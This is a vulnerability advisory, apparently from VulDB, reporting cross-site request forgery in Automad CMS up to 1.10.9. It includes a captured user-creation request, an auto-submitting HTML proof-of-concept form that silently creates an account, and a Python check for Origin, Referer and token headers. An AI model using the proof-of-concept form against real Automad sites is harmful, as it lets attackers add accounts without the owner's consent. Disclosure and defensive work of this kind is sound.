| Title | Automad CMS <= 1.10.9 Multiple Cross-Site Request Forgery (CSRF) |
|---|---|

Description:

After observation, it was discovered that the application does not implement CSRF tokens by default, making it vulnerable to CSRF attacks. This impacts the overall functionality of the application. Below is a view of one of the action requests while adding a user:
```http
POST /dashboard?controller=UserCollection::createUser HTTP/1.1
Host: automad.scr
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 76
Origin: http://automad.scr
Connection: close
Referer: http://automad.scr/dashboard?view=System
Cookie: Automad-8d86b702d2bd8d7c568d8600480adaef=feu6beoo6sc7ha2gp2gilsk211
X-PwnFox-Color: green

username=User&email=User%40example.com&password1=Passw0rd&password2=Passw0rd
```
CSRF HTML:

```html
<html>
<body>
<form action="http://automad.scr/dashboard?controller=UserCollection::createUser" method="POST">
<input type="hidden" name="username" value="User" />
<input type="hidden" name="email" value="User@example.com" />
<input type="hidden" name="password1" value="Passw0rd" />
<input type="hidden" name="password2" value="Passw0rd" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
```
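As an added defender-side example (not code from the advisory or from Automad), the following Python check decides whether a POST to the createUser controller should be accepted: it requires the Origin and Referer headers to match the Host and, assuming a hypothetical `csrf_token` form field, that a token is present in the body. Run over the captured request above it reports only the missing token; run over a constructed copy of the same POST submitted from a third-party origin, which is what the auto-submitting form produces in a victim's browser, it also reports the cross-origin headers.

```python
from urllib.parse import parse_qs, urlsplit

# Dashboard controllers that change state and therefore need CSRF protection
# (only the endpoint from the captured request is listed).
STATE_CHANGING = {"UserCollection::createUser"}

def parse_raw_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.strip()

def csrf_findings(raw: str, token_field: str = "csrf_token") -> list:
    """Reasons a POST to a state-changing controller should be rejected.
    token_field is a hypothetical name; Automad <= 1.10.9 sends none."""
    method, target, headers, body = parse_raw_request(raw)
    controller = parse_qs(urlsplit(target).query).get("controller", [""])[0]
    if method != "POST" or controller not in STATE_CHANGING:
        return []
    findings = []
    host = headers.get("host", "")
    for name in ("origin", "referer"):
        value = headers.get(name)
        if value is None:
            findings.append(f"missing {name} header")
        elif urlsplit(value).netloc != host:  # Host has no scheme: compare authority
            findings.append(f"{name} {value} is not same-origin with {host}")
    if token_field not in parse_qs(body):
        findings.append(f"no {token_field} field in body")
    return findings

BODY = "username=User&email=User%40example.com&password1=Passw0rd&password2=Passw0rd"

# The request captured in the advisory, abridged to the relevant headers.
CAPTURED = "\n".join([
    "POST /dashboard?controller=UserCollection::createUser HTTP/1.1",
    "Host: automad.scr", "Origin: http://automad.scr",
    "Referer: http://automad.scr/dashboard?view=System", "", BODY])

# Constructed: the same POST as a browser sends it when the advisory's
# auto-submitting form is served from a third-party page.
FORGED = "\n".join([
    "POST /dashboard?controller=UserCollection::createUser HTTP/1.1",
    "Host: automad.scr", "Origin: http://attacker.invalid",
    "Referer: http://attacker.invalid/", "", BODY])
```

`csrf_findings(CAPTURED)` returns only the missing-token finding, while `csrf_findings(FORGED)` additionally reports both cross-origin headers.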
| Source | https://github.com/screetsec/VDD/tree/main/Automad%20CMS/Cross-Site%20Request%20Forgery%20(CSRF) |
|---|---|
| User | Maland (UID 59886) |
| Submission | 09/12/2023 18:15 (3 years ago) |
| Moderation | 21/12/2023 09:19 (12 days later) |
| Status | Accepted |
| VulDB entry | 248687 [automad up to 1.10.9 User Creation dashboard?controller=UserCollection::createUser cross site request forgery] |
| Points | 20 |